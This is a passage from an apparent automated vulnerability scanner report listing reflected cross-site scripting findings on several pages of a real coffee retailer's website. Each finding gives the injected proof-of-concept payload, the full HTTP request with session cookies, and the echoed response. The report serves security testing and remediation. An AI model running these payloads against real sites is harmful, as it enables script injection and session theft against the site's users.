Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be1ba"style="x:expression(alert(1))"2e68e935a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:15 GMT
Connection: close
Content-Length: 56088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?be1ba"style="x:expression(alert(1))"2e68e935a83=1" />
...[SNIP]...

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25c37"%3balert(1)//2d0969caa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25c37";alert(1)//2d0969caa59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee?25c37"%3balert(1)//2d0969caa59=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:19 GMT
Connection: close
Content-Length: 55993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
type="text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "89759525001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee?25c37";alert(1)//2d0969caa59=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14736"style%3d"x%3aexpression(alert(1))"c3b68698284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14736"style="x:expression(alert(1))"c3b68698284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?14736"style%3d"x%3aexpression(alert(1))"c3b68698284=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:36 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?14736"style="x:expression(alert(1))"c3b68698284=1" />
...[SNIP]...

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29816"style="x:expression(alert(1))"6d1aa7d73d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:45 GMT
Connection: close
Content-Length: 39129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?29816"style="x:expression(alert(1))"6d1aa7d73d1=1" />
...[SNIP]...

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70f3b"style="x:expression(alert(1))"df67647ac4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:57 GMT
Connection: close
Content-Length: 43949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?70f3b"style="x:expression(alert(1))"df67647ac4c=1" />
...[SNIP]...

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1318e"style="x:expression(alert(1))"b348d971bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:27 GMT
Connection: close
Content-Length: 50682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?1318e"style="x:expression(alert(1))"b348d971bc6=1" />
...[SNIP]...

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db288"style%3d"x%3aexpression(alert(1))"ffbed84d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db288"style="x:expression(alert(1))"ffbed84d709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?db288"style%3d"x%3aexpression(alert(1))"ffbed84d709=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:45 GMT
Connection: close
Content-Length: 41422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?db288"style="x:expression(alert(1))"ffbed84d709=1" />
...[SNIP]...

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68e89"style="x:expression(alert(1))"ef92fe52f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:24 GMT
Connection: close
Content-Length: 41464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?68e89"style="x:expression(alert(1))"ef92fe52f9f=1" />
...[SNIP]...

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4203"style="x:expression(alert(1))"93ec1632d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:25 GMT
Connection: close
Content-Length: 40201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?d4203"style="x:expression(alert(1))"93ec1632d62=1" />
...[SNIP]...

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fd5c"style="x:expression(alert(1))"93089c0b9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:06 GMT
Connection: close
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?4fd5c"style="x:expression(alert(1))"93089c0b9ff=1" />
...[SNIP]...

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d779"style="x:expression(alert(1))"13c0978d7ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:24 GMT
Connection: close
Content-Length: 56951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?2d779"style="x:expression(alert(1))"13c0978d7ed=1" />
...[SNIP]...

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c38"style="x:expression(alert(1))"f99dc12b612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:42 GMT
Connection: close
Content-Length: 42379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style="x:expression(alert(1))"f99dc12b612=1" />
...[SNIP]...

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76daa"%3balert(1)//724980535d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76daa";alert(1)//724980535d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa"%3balert(1)//724980535d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:44 GMT
Connection: close
Content-Length: 42284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
shvars.playerType = "reserve";
       flashvars.playlistID = "624827690001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa";alert(1)//724980535d7=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcf0f"style="x:expression(alert(1))"ad29da1d3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:01 GMT
Connection: close
Content-Length: 41036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style="x:expression(alert(1))"ad29da1d3f1=1" />
...[SNIP]...

2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
